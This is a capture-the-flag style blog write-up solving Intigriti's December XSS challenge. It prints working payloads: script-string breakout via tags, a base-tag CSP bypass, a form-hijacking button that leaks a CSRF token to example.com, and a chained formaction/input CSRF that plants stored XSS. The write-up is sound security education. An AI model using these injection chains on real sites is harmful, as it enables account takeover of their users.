A late writeup

I started to write down my solution to Intigriti’s December XSS challenge but failed to meet the deadline. Despite the missed deadline, I felt like I should still post this. Mainly to force me to start up my blog in 2023.

My solution does not differ that much from the great writeup by farisv, but this is how I found it.

The challenge

The challenge can be found on

https://challenge-1222.intigriti.io/

The rules are listed as follows:

  • Should work on the latest version of Chrome and Firefox.
  • Should execute alert showing the victim’s/another user’s username..
  • Should leverage a cross-site scripting vulnerability on this domain.
  • Shouldn’t be self-XSS or related to MiTM attacks.
  • Should NOT use another challenge on the intigriti.io domain.

The actual challenge page can be found under the path /challenge. This page drops us into a simple multiuser blog application. We can visit some default blog pages on /blog/[UUID] or sign in and edit our own blog page (assigning us a new UUID).

A user can also post comments on other users’ blog pages.

Testing the application

When approaching applications like this my first action is to fill out all forms and click all links. I tried to write a comment on one of the default blog pages (/blog/00000000-00000000-00000000-00000000) but this did not lead to any injections. The other option is creating your own blog page by visiting /edit. This page states

Edit your blog here and share it later with your friends. You can use HTML if you want, but don’t do shady things!

Exameming sanitizers

I have not been doing web security for too long, but one observation I have made is that no application seems to get this part right! Letting a user render HTML on your domain is not an easy task (from my experience only iframes with the sandbox flag get close enough to protecting users from other users’ input). I have also learned that this does not mean that a “simple XSS” is always possible, but rather that injections are a way broader category with a lot of corner cases. That’s why I usually start out with this payload

'"><h1>asd</h1>

Entering this into both the content and the tags field on this page reveals a first injection point in the rendered taglist.

First injection

Testing something more interesting like

'"><img/src/onerror=alert(1)><script>alert(2)</script>

showed that the tags rendered in the DOM

<div class="col-2 m-1 border rounded bg-info" id="'&quot;><img/src/onerror=alert(1)><script>alert(2)</script>">
    '"&gt;
    <img src="" onerror="alert(1)">
    <script>alert(2)</script>
</div>

But the terminal showed that the img tag got blocked by CSP while the script tag did not execute at all. Some other console errors hinted at the input being used by some application javascript

Uncaught SyntaxError: Unexpected token '<'

Looking for help on twitter

Looking at the source code these lines show what is happening

tags.forEach(element => {
            element = element.trim();
            let div = document.createElement("div");
            div.classList.add("col-2", "m-1", "border", "rounded", "bg-info");
            div.id = element;            
            let s = document.createElement("script");
            s.innerText = `document.querySelector("#${element}").addEventListener("click", () => remove_tag("${element}"))`;
            div.innerHTML = element;
            tags_output.appendChild(div);
            tags_output.appendChild(s);
        });

Here we can see that each tag we supply in the tag field will be concatenated into a new script element’s innerHTML. This allows us to inject arbitrary javascript code as long as we make the whole line end up as valid javascript. A short example is this one

x");alert(1)//

which will give us the full script content

document.querySelector("#x");alert(1)//").addEventListener("click", () => remove_tag("x");alert(1)//"))

This will immediately pop up the alert box. That is great, but this is just a self XSS as there is no way to share this page with other users. Saving the blog and visiting https://challenge-1222.intigriti.io/blog/[UUID] will not trigger the payload. I decided to leave this for now and move over to the content field as this can be shared with other users.

Moving away from self-XSS (and a first solution)

Entering some basic XSS payloads into the field, saving, and visiting the blog page proves that there is some sort of sanitization in place. At this time I usually copy-paste some gigantic payload blob into the input field to see if any normal XSS bypasses work. They did not in this case.

The next step when testing sanitizers is to look at other parts of HTML that can cause problems. I usually test for some basic tags such as

<form><input></form>
<div id=test name=test data-test=test class=tesst>test</div>
<iframe></iframe>

As I had already gotten a hint about CSP being in place (from the self XSS injection) I also decided to check the CSP on https://csp-evaluator.withgoogle.com. This hinted at the base tag being a possible vector. I tested with <base href=//example.com>, and it worked. This turned out to be the unintended solution to this challenge. It is a nice trick that I have used on multiple occasions on real bug bounty targets (An example of using the base tag can be found in this report I wrote to the GitLab program on Hackerone). The common mistake made by developers is assuming that the default-src: self will be used if the base-uri is omitted. This is not the case, the base-uri does not inherit any falback rules and must be sat by itself.

My test payload did prove that the sanitizer did not remove form or input tags, it also did not remove id, name, or class attributes. This opens up for DOM clobbering or javascript hijacking. Furthermore, opening up the source code for the blog page revealed this code snippet

document.addEventListener("DOMContentLoaded", function(){
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    const share = urlParams.get('share')
    if (share != null) {
        let share_button = document.querySelector("#share-button");
        share_button.click()
    }
  });

This gives us the possibility to have the page “auto-click” whatever object we want by hijacking the id share-button on any of our HTML content.

Using “on-site CSRF” to escalate self XSS

My first thought was to add a form like this

<form action="/edit">
    <input name="content" value="test">
    <input name="tags" value="a&quot;;alert(1)//">
    <input type="submit" id="share-button">
</form>

and having the form auto-submitted by sending the link https://challenge-1222.intigriti.io/blog/[UUID]?share=x to a victim.

This ended up not working as any POST actions on the page are protected with CSRF tokens. I tried some CSRF token bypasses but it looked like the site treated the token correctly.

Going back to the blog page I moved my focus to the comment form. This form contains a hidden input value

<input type="hidden" name="csrf_token" value="[TOKEN]">

that is added to the request when a comment is added by the user. This is a normal flow for CSRF token protection that makes it impossible for malicious users to make their own POST requests, even if they find a way to inject form tags or make basic CSRF requests. This particular situation has occurred to me in the past, I remember asking for help on Twitter

Looking for help on twitter

and @michenriksen@chaos.social helped me out and showed me the formaction attribute that can be used on button elements to change the action of any form. Using the form attribute on the same button also allows for changing the action of form elements that do not enclose the button itself.

I decided to try this payload to leak the CSRF token to be able to perform a real cross-site request forgery on the edit page.

<button form="comment-form" formaction="https://example.com">Test</button>

I ended up creating the whole CSRF PoC on my page here https://joaxcar.com/poc/inti/hack.html just to realize that the token was not the only protection on the challenge page… It turns out the page is also protected by having the session cookie added as SameSite: LAX, meaning it will not be included in cross-site form submissions.

Another finding, before seeing the full picture, was to try different ways to embed content in HTML while bypassing the sanitizer. I looked at this blog post from Gareth Hayes, https://portswigger.net/research/framing-without-iframes for inspiration. The sanitizer used did not strip object tags, allowing me to frame any page on the blog page (again restricted by CSP). It still did not lead to any solution.

Putting things together

The final puzzle piece was found by a Google for “how to link input field to another form”. This taught me that it is not only the button element that can target arbitrary form elements. It turns out that input elements can also be given a form attribute, linking it to any arbitrary form and ending up being included in that form’s submission. This allows us to inject this final CSRF payload

<button id=share-button formaction="/edit" form=comment-form type=submit>Test</button>
<input form=comment-form name=tags value='x");window.onload=()=>alert(document.getElementsByClassName("navbar-brand")[0].innerText.substr(17))//'>
<input form=comment-form name=content value="<object type='text/html' data='/edit'></object>">

If we now send this link to a victim https://challenge-1222.intigriti.io/blog/[UUID]?share=x the page will automatically click the button and hijack the comment form using the two new input elements. The first input field will inject this payload into the tags field

x");window.onload=()=>alert(document.getElementsByClassName("navbar-brand")[0].innerText.substr(17))//

This will make sure to pop an alert when the page has finished loading, containing the active user’s username.

The other input element contains this payload

<object type='text/html' data='/edit'></object>

this will have the victim’s user’s blog post page contain a framed copy of the victim’s edit page. This will have the tags payload fire both when visiting the edit and the blog page.

First injection

Final thoughts

This was a great challenge! I really enjoyed solving it. Sometimes challenges like this can feel a bit “made up”, but this challenge felt like a real-world scenario to me. Some reports by me to GitLab containing similar techniques can be found here

https://gitlab.com/gitlab-org/gitlab/-/issues/365427

https://hackerone.com/reports/1533976

https://hackerone.com/reports/1409788